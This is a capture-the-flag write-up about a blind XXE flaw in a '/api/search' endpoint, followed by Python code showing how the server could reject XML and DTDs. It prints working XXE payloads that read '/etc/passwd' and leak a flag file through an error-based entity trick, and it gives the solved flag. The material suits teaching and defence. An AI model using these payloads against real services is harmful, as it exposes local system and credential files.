This challenge uses JavaScript to encode our selection into Braille (https://www.pharmabraille.com/pharmaceutical-braille/the-braille-alphabet/). It then sends the data to /api/search with Content-Type application/json.
If we change the Content-Type to application/xml, the server returns an XML parse error, so we know the target server also accepts XML as input.
There is no response output for the XXE payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message[
<!ELEMENT message ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<message>&xxe;</message>
But if we reference an existing file, it returns "No result found", and if we reference a non-existent file, it returns "Error: Failure to process entity xxe, line 6, column 15".
So this is a blind XXE, and we need another way to exfiltrate the result.
The challenge disables outbound HTTP requests, so we can't use out-of-band XXE.
Then I tried error-based XXE to bring the result into the error message (https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/).
Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message[
<!ELEMENT message ANY >
<!ENTITY % NUMBER '<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%NUMBER;
]>
<message>a</message>
flag: CTF{0x1033_75008_1004x0}
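As an added example (not part of the writeup or the challenge's code), here is how the /api/search endpoint could have closed this bug from the server side, using only the Python standard library: handle_search refuses any Content-Type other than the documented application/json, so the client can no longer switch the server onto an XML parser; parse_xml_message is for services that genuinely must accept XML and rejects the DOCTYPE that every XXE variant above (classic, blind, error-based) depends on. The function and field names and the sample bodies are constructed assumptions.

```python
import json
import xml.parsers.expat as expat

# Constructed sample bodies. XXE_BODY is the classic payload from the writeup.
JSON_BODY = b'{"q": "hello"}'
XXE_BODY = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message[
<!ELEMENT message ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<message>&xxe;</message>'''


class DoctypeRejected(Exception):
    """Raised when a request body carries a DTD, which a search query never needs."""


def parse_xml_message(body: bytes) -> str:
    """Return the text of <message>, refusing DTDs and external entities."""
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' not accepted")

    # Refusing the DOCTYPE at its declaration stops entity expansion before
    # any SYSTEM identifier (file:///...) is ever looked at.
    parser.StartDoctypeDeclHandler = reject_doctype
    # Defence in depth: never expand parameter entities, and make expat raise
    # (handler returns 0) if an external entity reference is ever reached.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = lambda *_: 0
    chunks = []
    parser.CharacterDataHandler = chunks.append
    parser.Parse(body, True)
    return "".join(chunks)


def classify_xml_body(body: bytes) -> str:
    """Label a body the way a request filter or log enricher would."""
    try:
        parse_xml_message(body)
    except DoctypeRejected:
        return "rejected-doctype"
    except expat.ExpatError:
        return "rejected-malformed"
    return "accepted"


def handle_search(content_type: str, body: bytes) -> tuple:
    """JSON-only /api/search: the client must not get to pick the parser."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        return 415, "Unsupported Media Type"
    try:
        query = json.loads(body)["q"]
    except (ValueError, KeyError, TypeError):
        return 400, "Bad Request"
    return 200, f"No result found for {query!r}"
```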